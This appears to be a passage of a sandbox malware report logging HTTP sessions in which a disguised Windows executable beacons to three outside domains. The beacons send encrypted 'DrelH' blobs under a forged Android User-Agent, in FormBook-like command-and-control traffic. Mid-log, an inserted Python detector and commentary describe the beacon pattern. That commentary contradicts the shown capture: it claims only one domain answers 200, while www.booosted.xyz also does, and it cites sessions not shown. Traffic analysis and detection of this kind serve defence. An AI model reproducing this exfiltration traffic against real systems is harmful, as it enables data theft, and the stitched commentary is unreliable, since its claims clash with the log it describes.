                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 4e 34 59 6a 6e 62 65 42 73 61 49 43 59 6e 4e 58 4b 43 73 32 65 51 4e 42 78 4f 44 73 57 75 69 47 48 39 54 59 37 4c 70 67 64 73 43 53 69 62 74 2b 33 41 6f 6e 4b 6e 77 50 75 4c 36 37 75 47 59 64 34 69 62 2f 6f 41 4b 36 6c 61 2f 6f 57 7a 50 61 56 5a 76 5a 6d 76 6e 79 72 4e 4d 4e 7a 46 6c 4e 6f 4e 34 46 47 63 50 75 70 4b 56 66 6d 36 48 78 4a 6f 69 72 64 49 74 33 53 37 76 49 37 4f 69 6d 4b 49 78 44 5a 61 68 52 75 61 51 37 2b 36 57 34 35 6c 71 42 6d 57 55 62 64 62 37 33 75 70 72 56 6a 50 69 56 66 58 52 2b 70 75 74 4e 69 79 47 51 6a 54 4f 2f 67 77 46 6c 75 68 4c 61 47 2f 66 57 68 32 51 64 46 33 6d 38 6b 46 66 30 4c 46 74 4d 55 39 7a 44 48 72 49 65 4c 44 61 44
                                                                                                                                  Data Ascii: DrelH=N4YjnbeBsaICYnNXKCs2eQNBxODsWuiGH9TY7LpgdsCSibt+3AonKnwPuL67uGYd4ib/oAK6la/oWzPaVZvZmvnyrNMNzFlNoN4FGcPupKVfm6HxJoirdIt3S7vI7OimKIxDZahRuaQ7+6W45lqBmWUbdb73uprVjPiVfXR+putNiyGQjTO/gwFluhLaG/fWh2QdF3m8kFf0LFtMU9zDHrIeLDaD


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   39 | 192.168.2.5 | 53242 | 3.33.130.190 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:59:02.726398945 CEST | 1787 | OUT | POST /m7sk/ HTTP/1.1
                                                                                                                                  Host: www.ethetf.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.ethetf.digital
                                                                                                                                  Referer: http://www.ethetf.digital/m7sk/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 4e 34 59 6a 6e 62 65 42 73 61 49 43 59 6e 4e 58 4b 43 73 32 65 51 4e 42 78 4f 44 73 57 75 69 47 48 39 54 59 37 4c 70 67 64 73 61 53 2b 34 31 2b 32 6e 63 6e 45 48 77 50 67 72 36 36 75 47 59 36 34 69 54 37 6f 41 47 45 6c 66 7a 6f 45 68 48 61 42 39 44 5a 78 66 6e 79 30 39 4d 49 75 31 6c 45 6f 4e 6f 5a 47 63 2f 75 70 4b 56 66 6d 35 66 78 41 61 4b 72 4f 59 74 32 56 37 76 50 78 75 6a 4c 4b 49 70 31 5a 61 73 75 75 4a 49 37 35 65 36 34 34 57 53 42 75 57 55 5a 65 62 37 56 75 6f 58 4b 6a 4f 4f 5a 66 58 6c 48 70 70 42 4e 67 33 71 47 7a 79 4f 51 36 42 31 37 38 6a 66 36 54 59 54 59 76 31 4d 54 59 55 4f 43 75 32 66 58 63 79 64 4b 63 2b 53 4c 59 4b 59 5a 50 32 6a 4e 45 33 70 6d 71 44 48 2f 71 55 62 2f 73 47 33 68 69 51 5a 6e 62 71 66 72 6c 4c 46 79 72 4a 76 74 52 46 4b 32 56 48 52 75 33 4b 39 38 75 79 54 41 79 6b 44 4a 7a 5a 34 4a 55 46 52 6d 63 50 6a 4f 52 41 42 46 5a 51 76 38 57 41 4a 45 70 6f 56 79 45 79 34 43 64 47 6f 6a 48 71 6b 79 58 42 38 68 4f 31 76 55 31 37 6e 49 4e 66 55 45 43 6c 56 43 [TRUNCATED]
                                                                                                                                   Data Ascii: DrelH=[TRUNCATED]


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   40 | 192.168.2.5 | 53243 | 3.33.130.190 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:59:05.265094995 CEST | 483 | OUT | GET /m7sk/?DrelH=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC80JPe0JQf+HZnvaZlGu7qv/1z0bLdCqC2RrE0forVuM7BfA==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.ethetf.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                   Oct 22, 2024 22:59:05.923753023 CEST | 403 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Tue, 22 Oct 2024 20:59:05 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 263
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 72 65 6c 48 3d 41 36 77 44 6b 74 58 4e 2b 71 38 4c 62 47 73 47 41 32 30 44 66 58 31 32 30 4c 66 43 4f 38 6e 75 4e 38 37 74 36 4a 5a 4d 4f 2b 61 34 6f 59 5a 73 2f 51 52 39 41 58 63 6e 32 71 33 44 73 44 6b 4f 76 32 48 63 37 53 71 35 31 4f 48 2b 57 6c 4c 61 4b 4a 43 38 30 4a 50 65 30 4a 51 66 2b 48 5a 6e 76 61 5a 6c 47 75 37 71 76 2f 31 7a 30 62 4c 64 43 71 43 32 52 72 45 30 66 6f 72 56 75 4d 37 42 66 41 3d 3d 26 53 78 3d 67 6e 4d 34 5a 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?DrelH=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC80JPe0JQf+HZnvaZlGu7qv/1z0bLdCqC2RrE0forVuM7BfA==&Sx=gnM4ZH"}</script></head></html>


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   41 | 192.168.2.5 | 53244 | 3.33.130.190 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:59:11.008121014 CEST | 744 | OUT | POST /12c7/ HTTP/1.1
                                                                                                                                  Host: www.booosted.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.booosted.xyz
                                                                                                                                  Referer: http://www.booosted.xyz/12c7/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6d 6d 69 4c 6d 77 58 79 66 5a 58 67 61 31 71 4d 77 53 75 6a 4b 47 44 76 78 4e 4f 57 4b 72 5a 7a 76 77 46 49 44 35 48 63 39 64 30 70 57 4b 57 37 4a 51 76 79 67 56 61 55 49 6f 72 2f 33 4a 38 54 45 70 51 51 61 78 59 63 6b 61 49 43 73 36 6e 59 72 48 79 4b 44 6c 39 38 57 30 41 71 79 46 66 41 74 41 58 71 4e 76 37 69 42 7a 42 4f 63 63 2b 49 6a 4b 31 6a 6c 51 4a 35 4f 64 78 50 68 64 79 54 68 54 33 6f 47 53 36 76 77 34 31 31 33 32 43 63 74 4c 55 53 47 5a 74 45 46 49 6c 2b 74 35 48 79 61 50 43 70 30 5a 47 78 46 38 37 6b 78 2b 5a 51 48 46 7a 4a 76 71 44 69 77 4d 55 4b 50 54 6a 68 78 6b 6e 57 53 48 30 3d
                                                                                                                                  Data Ascii: DrelH=mmiLmwXyfZXga1qMwSujKGDvxNOWKrZzvwFID5Hc9d0pWKW7JQvygVaUIor/3J8TEpQQaxYckaICs6nYrHyKDl98W0AqyFfAtAXqNv7iBzBOcc+IjK1jlQJ5OdxPhdyThT3oGS6vw41132CctLUSGZtEFIl+t5HyaPCp0ZGxF87kx+ZQHFzJvqDiwMUKPTjhxknWSH0=
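The sessions above repeat one beacon shape across three domains (www.030002837.xyz, www.ethetf.digital, www.booosted.xyz): a POST to a single short directory such as /y045/ or /m7sk/ carrying one form field (DrelH=) whose value is a base64-looking blob, then a GET to the same directory with that field plus a short token (Sx=gnM4ZH) in either order, all sent with an Android Chrome User-Agent from a Windows executable and with Origin/Referer pointing back at the same host. The following Python is an added example, not part of the Joe Sandbox report, that turns those observations into request-side detection logic. The two malicious records copy the request line, headers and body of sessions 36 and 37 from the capture; the benign login request, its intranet.example host and the Firefox process path are constructed for contrast, and the indicator names are this example's own.

```python
import re
from dataclasses import dataclass

# Request shapes observed in the sessions above: one short directory with a
# trailing slash (/y045/, /m7sk/, /12c7/), a forged Android Chrome UA, and
# either a single base64 form field (POST) or a short token plus a base64 blob (GET).
PATH_RE = re.compile(r"^/[a-z0-9]{3,6}/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
SHORT_TOKEN_RE = re.compile(r"^[A-Za-z0-9]{4,8}$")


@dataclass
class HttpRequest:
    method: str
    target: str               # request-target from the request line, e.g. "/m7sk/?k=v"
    headers: dict             # header names lower-cased
    body: str = ""
    client_process: str = ""  # from the session table; lets us compare the UA with the real client


def split_form(text: str) -> list:
    """key=value pairs WITHOUT percent/plus decoding: the blobs carry raw '+', '/' and '='
    and urllib.parse.parse_qsl would turn every '+' into a space."""
    pairs = []
    for item in text.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((key, value))
    return pairs


def looks_base64(value: str, min_len: int = 40) -> bool:
    """Base64 alphabet, whole 4-char groups, long enough to be an encrypted blob rather than a token."""
    return len(value) >= min_len and len(value) % 4 == 0 and B64_RE.match(value) is not None


def formbook_indicators(req: HttpRequest) -> list:
    """Indicators the request satisfies, in a fixed order; [] means the path shape does not fit."""
    path, _, query = req.target.partition("?")
    if not PATH_RE.match(path):
        return []
    hits = ["short_dir_path"]

    if "Android" in req.headers.get("user-agent", "") and req.client_process.lower().endswith(".exe"):
        hits.append("android_ua_from_windows_exe")

    host = req.headers.get("host", "")
    if host and req.headers.get("origin") == f"http://{host}" \
            and req.headers.get("referer") == f"http://{host}{path}":
        hits.append("self_referencing_origin_referer")

    if req.method == "POST" and req.headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        fields = split_form(req.body)
        if len(fields) == 1 and looks_base64(fields[0][1]):
            hits.append("single_base64_form_field")
    elif req.method == "GET":
        values = [v for _, v in split_form(query)]
        # Two parameters in either order (the capture shows both Sx-first and DrelH-first).
        if len(values) == 2 and any(SHORT_TOKEN_RE.match(v) for v in values) \
                and any(looks_base64(v) for v in values):
            hits.append("token_plus_base64_query")
    return hits


def is_formbook_like(req: HttpRequest) -> bool:
    """Alert only on path shape + UA mismatch + a payload indicator; any one alone is too noisy."""
    hits = set(formbook_indicators(req))
    payload = {"single_base64_form_field", "token_plus_base64_query"}
    return {"short_dir_path", "android_ua_from_windows_exe"} <= hits and bool(hits & payload)


# Constructed records. The first two copy session 36 (GET) and session 37 (POST) from the
# capture above; the third is an invented benign login with the same short-path shape.
UA = ("Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36")
PROC = (r"C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP"
        r"\jEsBIhfnof.exe")
SAMPLES = {
    "session36_get": HttpRequest(
        "GET",
        "/y045/?Sx=gnM4ZH&DrelH=y1BC7gE5U9SjKVi4f+qVAHSx2lLKNXVMs/YJXs1dmV0xz4NUECnrQCoTHq2W+qQeH7vV4kPmjQT4"
        "fdprdSopc2q7pRx51jA4E/xrfKHMwg9y+RaF/+hNtwtULy/7l6WTkA==",
        {"host": "www.030002837.xyz", "user-agent": UA},
        client_process=PROC),
    "session37_post": HttpRequest(
        "POST", "/m7sk/",
        {"host": "www.ethetf.digital", "user-agent": UA,
         "content-type": "application/x-www-form-urlencoded",
         "origin": "http://www.ethetf.digital", "referer": "http://www.ethetf.digital/m7sk/"},
        body="DrelH=N4YjnbeBsaICZCFXMjs2WQNC+uDsPeiCH9fY7Ktwd+WS7/p+2E0nJnwPmr6+xWYs4iXZoFq6lZDoWy/aVO7Ylfnw+dMLu1lNoN4F"
             "GcK1pKdflL3xJKK0Xot2V7vIxuiYKIxtZepruYY7++a4+xGAsWUVCL6SrLuhmcKFfmYo2IdojEr65xGXzQpd+yDtXP+/7VAtbgw=",
        client_process=PROC),
    "benign_login": HttpRequest(  # constructed: real browser, two form fields, no Android UA
        "POST", "/login/",
        {"host": "intranet.example", "content-type": "application/x-www-form-urlencoded",
         "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"},
        body="user=alice&password=hunter2",
        client_process=r"C:\Program Files\Mozilla Firefox\firefox.exe"),
}


def scan(samples: dict) -> dict:
    """Name -> verdict for a batch of requests."""
    return {name: is_formbook_like(req) for name, req in samples.items()}


if __name__ == "__main__":
    for name, req in SAMPLES.items():
        print(f"{name}: formbook_like={is_formbook_like(req)} indicators={formbook_indicators(req)}")
```

The detector keys on the request rather than the response on purpose: two of the three domains in this capture answer 404 and only www.ethetf.digital answers 200 with a JavaScript redirect to /lander, so a rule that waits for a "successful" C2 reply would miss most of the beacons. The form values are split by hand instead of with parse_qsl because the blobs contain literal "+" and "/" characters that a URL decoder would corrupt, which is also why the base64 check works on the raw bytes of the request.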


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 53245 | 3.33.130.190 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:59:13.551187038 CEST | 764 | OUT | POST /12c7/ HTTP/1.1
Host: www.booosted.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.booosted.xyz
Referer: http://www.booosted.xyz/12c7/
Content-Length: 226
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: DrelH=mmiLmwXyfZXgbV6M8VajdWDso9OWALZ3vwJID5vM9vgpRrm7IVbyjVaUDIrw6p8EEotjawkckaMCs73YrwmLD196eUA0x1fAtAXqNv+5BzpOcP2Ilr1sowJ6JdxPldythT3wGXbKw69130acqeoRNZt4b4kxtpuGQ9/hw5zYe8Kf0I06dn7h8Kvagfc9ejCIrH3mMQj9QHqJJ3hXS7MCjXEp+792


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 53246 | 3.33.130.190 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:59:16.103272915 CEST | 1781 | OUT | POST /12c7/ HTTP/1.1
Host: www.booosted.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.booosted.xyz
Referer: http://www.booosted.xyz/12c7/
Content-Length: 1242
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: DrelH=mmiLmwXyfZXgbV6M8VajdWDso9OWALZ3vwJID5vM9v4pWY+7K2zyiVaUAIq36p88Eo1vawoikfQCtZvYikKLJ196S0A1yFfVtAnUNvO5BzpOcOGIm61suwJ5Odx5hdyWhTvgGXW/zLd1ykKcosAREZt6a4lutpyZQ5eYw521e+qf2OBeY0Pmoq7hrYYfFT212EHwEHSeYnyKLCpHSbVtxSA489ICbA+e246I0832XPDgCtYriwP1NWqtEmGadmvGDH+glhhIdhjFGaEqrERqJzaKP000ckqh6S/qA2xSU1OH0dVos8/UdBJks99wtOh/D3ha7+sAiVoOAHDnFnjxuu8bpeGR4h0QlmY4imSkRTaIkkh9JGB2iG5gJeUPel17cM4QsyeL2Mh5btwdDpeZJBrwVU48KpTpyI/xJr3KUbMnWOsD5lnUl+hB9gE+zJ1JeXYTZp1PoVsG+H0+wtk8O2Eq1Pau3hquvmCHr8jyo3Q2PHr0ZieVAZRhdixn0WfokUav9UebmmBh5Zsh6zMsCz/3a7dtptgCOY3/sZlIVIomP/fp8cK7695MwSfQfJdmK2Vvv3GY0+tdVD1SQgsrkBl3nPKQVMGyTxedj9ltLWCnzR9PzmzYLUxQkeFqheSrja0WIljPgIamlZ/cisSYFqiSTJyMKGOEG3iNVMCBBuxcmHiHWOl3prn60SbHxZwyJuMw7aRWQ7mAVOfWlKP0+BFvj/YfgHewy15LJdAadb8igLSJQPK3uarzyIBgDlToI5VIuuPz00yJfr3vUJZ/P0zX0YidzbmqTppSV75p/CyEDAF6mDHQCVWgaSlc4TmpQYIx3Nzc7O35hkPgsuAmO343aHXJpDv1aVxvGS0hRweVC3ubAIVpMIPQUJ0AlaRKyWzFTzyBJw1pRpcxFsChl3cWsVv5PFcn+x+m785bpc4KH7bYkqrY90RE1y7wF2BOeuenzXf7oqlUiOZgr41YuyHnbvxX1u2nwbbLKGDCJyO2Sd [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 53247 | 3.33.130.190 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:59:18.636172056 CEST | 481 | OUT | GET /12c7/?Sx=gnM4ZH&DrelH=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqOWVPblob6mrlgni+LdLmL1Exd/23ibR2hwRjCv5+3cT01Q== HTTP/1.1
Host: www.booosted.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 22, 2024 22:59:19.319845915 CEST | 403 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 22 Oct 2024 20:59:19 GMT
Content-Type: text/html
Content-Length: 263
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Sx=gnM4ZH&DrelH=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqOWVPblob6mrlgni+LdLmL1Exd/23ibR2hwRjCv5+3cT01Q=="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 53248 | 8.210.49.139 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:59:25.082164049 CEST | 747 | OUT | POST /0628/ HTTP/1.1
Host: www.djazdgc.tokyo
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.djazdgc.tokyo
Referer: http://www.djazdgc.tokyo/0628/
Content-Length: 206
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: DrelH=jf9vvpkpYXBmytm2JZ5JQAzazPCBtY/tPQJuEUgufVeE9Z5vTe7z+orOIZaCW3G+WD8piOhiYaABx9D+vMbPFzMQZbsbJtkbBgsQBklG9Lk0OjNBYh25aUgnoHxbzxbrkGgTyHLPodsZHLL1XlxJwr8Tutj5KAo2IoRuvI+q9IEcAARD8U2O5CViZoeQI4wg3bX+41o=
Oct 22, 2024 22:59:26.181091070 CEST | 507 | IN | HTTP/1.1 200
Server: nginx
Date: Tue, 22 Oct 2024 20:59:25 GMT
Content-Type: application/json;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://www.djazdgc.tokyo
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Data Ascii: 54{"msg":"请求访问：/0628/，认证失败，无法访问系统资源","code":401}0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 53249 | 8.210.49.139 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:59:27.624110937 CEST | 767 | OUT | POST /0628/ HTTP/1.1
Host: www.djazdgc.tokyo
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.djazdgc.tokyo
Referer: http://www.djazdgc.tokyo/0628/
Content-Length: 226
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: DrelH=jf9vvpkpYXBm05i2M6RJSgzbqPCBi4/pPQVuEVk+YnKE95JvSbHz/orOcJaHZXGPWCAPiMliYaUBx5P+s9bMKDMSW7sdGNkbBgsQBkx/9LM0OwVBZFq6X0gg8Xxb5RbvkGh0yGnlofEZHO31U3ZOpb9WjNiFbx18OeFyy6POrpA3F28pm2+mqi5aJ7WnZIRJt4HOmi+F4IPlVwrMI9LE0qGSU9lS
Oct 22, 2024 22:59:28.596154928 CEST | 507 | IN | HTTP/1.1 200
Server: nginx
Date: Tue, 22 Oct 2024 20:59:28 GMT
Content-Type: application/json;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://www.djazdgc.tokyo
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Data Ascii: 54{"msg":"请求访问：/0628/，认证失败，无法访问系统资源","code":401}0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 53250 | 8.210.49.139 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:59:30.170933962 CEST | 1784 | OUT | POST /0628/ HTTP/1.1
Host: www.djazdgc.tokyo
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.djazdgc.tokyo
Referer: http://www.djazdgc.tokyo/0628/
Content-Length: 1242
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: DrelH= [TRUNCATED]
Oct 22, 2024 22:59:31.178041935 CEST | 507 | IN | HTTP/1.1 200
Server: nginx
Date: Tue, 22 Oct 2024 20:59:31 GMT
Content-Type: application/json;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://www.djazdgc.tokyo
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
                                                                                                                                  Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 54{"msg":"/0628/","code":401}0


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   48 | 192.168.2.5 | 53251 | 8.210.49.139 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:59:32.714939117 CEST | 482 | OUT | GET /0628/?DrelH=udVPsZZaektnpNC9MvhveAugnKqjqPi3CgpOVGQRV3GxzahYZeT2u+nvI8XmYm2tQXkKvM1/LtgNko72s5T+AigTeJIoAagnD1dxA2tH0NgWMQZxZA+Ob34DrkJtsSinzg==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.djazdgc.tokyo
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                   Oct 22, 2024 22:59:33.673523903 CEST | 422 | IN | HTTP/1.1 200
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 22 Oct 2024 20:59:33 GMT
                                                                                                                                  Content-Type: application/json;charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Origin
                                                                                                                                  Vary: Access-Control-Request-Method
                                                                                                                                  Vary: Access-Control-Request-Headers
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  X-Cache: MISS
